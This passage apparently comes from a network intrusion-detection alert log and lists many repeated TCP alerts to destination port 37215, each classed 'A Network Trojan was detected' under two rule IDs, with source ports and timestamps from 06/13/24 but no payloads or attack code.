              SID:2829579
              Source Port:34732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546117
              SID:2829579
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137140
              SID:2835222
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247953
              SID:2835222
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259225
              SID:2835222
              Source Port:43964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942438
              SID:2835222
              Source Port:38302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169845
              SID:2829579
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632518
              SID:2835222
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695753
              SID:2829579
              Source Port:33080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246444
              SID:2835222
              Source Port:50458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728216
              SID:2829579
              Source Port:40826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992959
              SID:2835222
              Source Port:50942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109437
              SID:2829579
              Source Port:48766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421690
              SID:2829579
              Source Port:37624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943975
              SID:2835222
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889242
              SID:2835222
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176893
              SID:2835222
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196346
              SID:2829579
              Source Port:57616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354515
              SID:2835222
              Source Port:44276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092439
              SID:2829579
              Source Port:37550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440957
              SID:2829579
              Source Port:57130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484778
              SID:2835222
              Source Port:51554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835930
              SID:2829579
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154167
              SID:2835222
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421368
              SID:2829579
              Source Port:47254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501801
              SID:2829579
              Source Port:42380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833472
              SID:2829579
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868217
              SID:2829579
              Source Port:44056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545961
              SID:2829579
              Source Port:38664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240689
              SID:2835222
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217351
              SID:2829579
              Source Port:58826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975204
              SID:2829579
              Source Port:38792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406399
              SID:2835222
              Source Port:40606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310053
              SID:2829579
              Source Port:53702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456208
              SID:2835222
              Source Port:47814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356947
              SID:2835222
              Source Port:35942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936656
              SID:2835222
              Source Port:42962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821884
              SID:2829579
              Source Port:43280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228915
              SID:2835222
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224602
              SID:2835222
              Source Port:41802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945409
              SID:2829579
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991834
              SID:2829579
              Source Port:53550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554877
              SID:2835222
              Source Port:33602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680409
              SID:2835222
              Source Port:49392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245997
              SID:2829579
              Source Port:59896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629157
              SID:2829579
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458256
              SID:2829579
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566046
              SID:2829579
              Source Port:56488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727744
              SID:2835222
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460237
              SID:2835222
              Source Port:44584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197613
              SID:2829579
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224094
              SID:2835222
              Source Port:55856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094157
              SID:2835222
              Source Port:34624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279007
              SID:2829579
              Source Port:53476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569448
              SID:2835222
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317392
              SID:2835222
              Source Port:41194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707421
              SID:2835222
              Source Port:60634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993148
              SID:2829579
              Source Port:54454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805792
              SID:2835222
              Source Port:38228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213392
              SID:2829579
              Source Port:44404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487791
              SID:2835222
              Source Port:47224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301119
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154245
              SID:2829579
              Source Port:33566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045128
              SID:2835222
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452784
              SID:2835222
              Source Port:50980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305407
              SID:2835222
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782874
              SID:2829579
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344267
              SID:2835222
              Source Port:43350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786656
              SID:2829579
              Source Port:56952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240177
              SID:2829579
              Source Port:44412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633237
              SID:2835222
              Source Port:48876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456364
              SID:2829579
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349890
              SID:2835222
              Source Port:39540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195961
              SID:2829579
              Source Port:44070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802238
              SID:2835222
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611125
              SID:2835222
              Source Port:44134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544639
              SID:2835222
              Source Port:40822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046295
              SID:2829579
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632422
              SID:2829579
              Source Port:33052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702545
              SID:2835222
              Source Port:53840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097072
              SID:2835222
              Source Port:39420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149825
              SID:2829579
              Source Port:41566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322088
              SID:2829579
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349934
              SID:2835222
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697114
              SID:2829579
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176911
              SID:2835222
              Source Port:43652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749318
              SID:2835222
              Source Port:33220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159708
              SID:2829579
              Source Port:58592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604307
              SID:2829579
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322762
              SID:2829579
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936491
              SID:2835222
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248607
              SID:2835222
              Source Port:42714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246701
              SID:2835222
              Source Port:32922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784732
              SID:2835222
              Source Port:48864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108916
              SID:2835222
              Source Port:36346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455756
              SID:2835222
              Source Port:53228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304049
              SID:2835222
              Source Port:37470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784328
              SID:2829579
              Source Port:34764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306653
              SID:2829579
              Source Port:43810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993361
              SID:2829579
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150521
              SID:2835222
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129811
              SID:2835222
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886248
              SID:2835222
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131707
              SID:2835222
              Source Port:44520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457865
              SID:2835222
              Source Port:60146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610400
              SID:2835222
              Source Port:52018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784051
              SID:2835222
              Source Port:58002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132584
              SID:2835222
              Source Port:50182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048367
              SID:2835222
              Source Port:55418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106884
              SID:2835222
              Source Port:50606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784995
              SID:2829579
              Source Port:47560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302676
              SID:2829579
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834133
              SID:2835222
              Source Port:51512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758806
              SID:2829579
              Source Port:48474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272691
              SID:2835222
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408241
              SID:2835222
              Source Port:54718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126009
              SID:2829579
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238209
              SID:2835222
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501481
              SID:2835222
              Source Port:45316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294984
              SID:2835222
              Source Port:42094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571711
              SID:2829579
              Source Port:56422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248212
              SID:2835222
              Source Port:53638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753302
              SID:2835222
              Source Port:60078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304309
              SID:2835222
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417124
              SID:2829579
              Source Port:44804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942909
              SID:2829579
              Source Port:45712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039168
              SID:2829579
              Source Port:42844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259554
              SID:2829579
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094004
              SID:2829579
              Source Port:33100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606570
              SID:2835222
              Source Port:46878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488118
              SID:2835222
              Source Port:42122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993634
              SID:2829579
              Source Port:48380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753844
              SID:2835222
              Source Port:55504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300488
              SID:2835222
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026985
              SID:2829579
              Source Port:33086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727038
              SID:2829579
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476499
              SID:2835222
              Source Port:43768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711060
              SID:2835222
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174216
              SID:2829579
              Source Port:52772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216927
              SID:2835222
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913993
              SID:2829579
              Source Port:60852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674800
              SID:2829579
              Source Port:56688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320871
              SID:2835222
              Source Port:48542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275113
              SID:2829579
              Source Port:40884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275357
              SID:2829579
              Source Port:34558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945589
              SID:2835222
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128007
              SID:2835222
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109515
              SID:2835222
              Source Port:44236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970341
              SID:2835222
              Source Port:50440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087701
              SID:2829579
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092820
              SID:2829579
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089118
              SID:2829579
              Source Port:33108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940748
              SID:2835222
              Source Port:49288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695523
              SID:2829579
              Source Port:53912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833161
              SID:2835222
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298738
              SID:2829579
              Source Port:38086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271494
              SID:2829579
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108699
              SID:2829579
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941128
              SID:2829579
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242778
              SID:2829579
              Source Port:35818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348739
              SID:2829579
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130412
              SID:2829579
              Source Port:46430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160337
              SID:2835222
              Source Port:41750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868732
              SID:2829579
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672413
              SID:2835222
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978892
              SID:2835222
              Source Port:51968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423709
              SID:2829579
              Source Port:57782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274887
              SID:2829579
              Source Port:58192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191099
              SID:2835222
              Source Port:53110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078696
              SID:2835222
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377344
              SID:2835222
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048423
              SID:2835222
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416142
              SID:2835222
              Source Port:55184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027740
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304788
              SID:2835222
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787046
              SID:2835222
              Source Port:60076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830619
              SID:2835222
              Source Port:41170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702441
              SID:2829579
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423421
              SID:2835222
              Source Port:57528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830563
              SID:2829579
              Source Port:56970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323651
              SID:2835222
              Source Port:33152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214582
              SID:2829579
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839525
              SID:2835222
              Source Port:39866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127049
              SID:2829579
              Source Port:44004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224141
              SID:2829579
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754492
              SID:2835222
              Source Port:58754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731057
              SID:2835222
              Source Port:51600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026167
              SID:2835222
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727269
              SID:2835222
              Source Port:50686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419690
              SID:2829579
              Source Port:46862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672846
              SID:2829579
              Source Port:49042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217442
              SID:2829579
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155350
              SID:2829579
              Source Port:33690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609067
              SID:2829579
              Source Port:41444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994812
              SID:2835222
              Source Port:47360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756444
              SID:2835222
              Source Port:52812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106042
              SID:2829579
              Source Port:38190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193348
              SID:2829579
              Source Port:35542
              Destination Port:37215
